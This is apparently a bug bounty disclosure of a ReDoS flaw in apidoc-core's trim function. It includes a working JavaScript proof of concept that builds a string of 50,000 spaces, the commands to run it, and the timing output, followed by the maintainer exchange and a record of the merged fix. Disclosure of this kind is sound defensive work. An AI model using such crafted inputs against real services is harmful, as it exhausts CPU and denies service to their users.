Inefficient Regular Expression Complexity in apidoc/apidoc-core

Valid

Reported on

Jul 16th 2021


✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the apidoc-core package. An attacker that is able to provide crafted input to the trim function may cause an application to consume an excessive amount of CPU. Similar attack ref: https://nvd.nist.gov/vuln/detail/CVE-2020-7753

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// PoC.js
var trim = require("apidoc-core/lib/utils/trim")

function build_attack (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}

return ret + "1";
}
var time = Date.now();
trim(build_attack(50000))
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost)

Execute the following command in another terminal:

npm i apidoc-core
node poc.js

Check the Output:

time_cost: 2546

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.

Occurences

ready-research submitted a
5 months ago
ready-research
5 months ago

Researcher


With the above patch, the output is time_cost: 6

We have contacted a member of the apidoc/apidoc-core team and are waiting to hear back 5 months ago
apidoc/apidoc-core maintainer
5 months ago

Maintainer


Thank you, but currently this is a minor problem, a hacker must have access to a system to inject such a code.

ready-research
5 months ago

Researcher


@maintainer I have provided a patch as well. Please take a look whenever you have time. Thank you.

Nicolas CARPi validated this vulnerability 3 months ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
Nicolas CARPi confirmed that a fix has been merged on 976056 3 months ago
ready-research has been awarded the fix bounty